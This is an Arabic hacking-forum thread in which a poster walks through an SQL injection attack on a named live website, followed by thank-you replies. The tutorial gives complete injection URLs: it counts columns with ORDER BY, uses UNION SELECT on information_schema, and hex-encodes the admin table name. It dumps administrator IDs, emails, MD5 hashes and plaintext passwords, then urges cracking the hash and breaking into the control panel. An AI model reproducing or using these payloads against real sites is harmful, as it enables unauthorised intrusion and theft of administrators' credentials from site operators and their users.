ترتيب الخطوات في حقن قواعد البيانات SQL Injection

[KaLa$nikoV]

عنا موقع مصاب

http://www.datavore.com/home?op=cat&cid=2


نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

order by 1--
 
order by 5--
 
order by 10--
 
order by 15--

لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا

order by 1/*

يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

انتبه للناقص

الان لنعرف اصدار القاعده
نكتب

version()

وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه

concat(table_name,0x3a,column_name,0x3a,table_schema)

و

+from+information_schema.columns--

فتصبح

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns--

الان نضيف الامر التالي

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS

زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

http://www.waraxe.us/sql-char-encoder.html

اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو
SurveyAdmins
نوع التشفير هو

  MySql hex-encoded string

يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

where+table_name=0x53757276657941646d696e73

الاستغلال

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73--

ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول
SurveyAdmins

السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)

;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;

[CENTER]نجمعهم بالامر

بصيرو
 
[php]

concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)

نركبه بالحقنه

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--

بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق

والله يا حبايبي اجيت اعمل لكم الدرس صوت وصوره بعد من خلصت من هالكتابه الطويله
لقيت الموقع ضرب ومش راضي يفتح
رح اشرح نفس الخطوات على موقع ثاني
بعين الله

استفين ع التاخر هي الدرس بالفيديو .....

من اكتشاف الثغره SQL الى لوحه التحكم بالصوت والصوره
[/CENTER]

 

[فايروس عرعر]

ششرحك جونااااان/يعطيك الف عافيه

 

[KaLa$nikoV]

تسلم يا غالي
بس الشرح هو ع السريع ما بغني عن دوره
والدوره عما قريب
بس اول ما افضى

 

[M!M0]

مشكوووووووووور أخي VoLc4n0 على الشرح

 

[THE WARRIOR]

شكرااااا ليك جارى التجريب

 

[Black-FoG]

وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos

 

[الشبح المرح]

تسلم ياحبيبي يابركان

و لاكن هدا بالنسبة للاصدار 5

و الاصدار 4 نستعمل طرق اخرى

للتوضيح فقط يابركان ههههه

 

[El3ctr0-Dz]

مشكووووور بارك اله فيك

 

[the cold zero]

شكرا على الشرح الممتاز

 

[Black-FoG]

Up

V
V
V

للأهمية



Adioooos

 

[M!M0]

شكرا لك فولكانو للشرح والدورة

 

[فتى المدينه]

يعطيك الف عافيه على الشرح خيوووو

شرح واضح وفية وكفيت

 

[مجاهد]

السلام عليكم ورحمة الله وبركاته

انا تلميذ جديد لديكم

والله لقد اعجبني هذا المنتدى بما فيه من مواضيع صادقة ومن مبدعين محترمين فانا ارحب بكم وانا افتخر بان اكون تلميذ لديكم
وانا اشكر الاخ VoLc4n0 لانه شجعني بان اشارك معكم وهذا يعود في طريقة شرحه لدروس
اقبلوني وانا ممتنا لكم
تقبلوا تحياتي
مجــــــــــــــــــــــــــــــــا هد
​

 

[Dr.NaNo]

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
موفق بإذن الله ... لك مني أجمل تحية .

 

[ღ}~ ملكة الهاكر ريماس ~{ღ]

يسلمووووووووووووووا ايديك اخي الغااااااالى والعزيز

اشكرررررررررررررررررررك

 

[sub zero]

i learn from your cours and now i'm hacker because of you volcano you are the best and my age is 17 thanx and thanx for this forum is the best every second i get something new and it's very good your cours thanx thanx thanx volcano

 

[samourai_7]

بارك الله فيك

 

[SnaKe-Dz]

بارك الله فيك ..

 

[parazit]

مشكور اخي
بارك الله فيك

 

[blablabou94]

وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos

الكبير هو الله ... أرجوك ماتعاويدها هاي الكلمة أرجوك .. قل شكرا ........ شكرا فولكان على الشرح رائع والله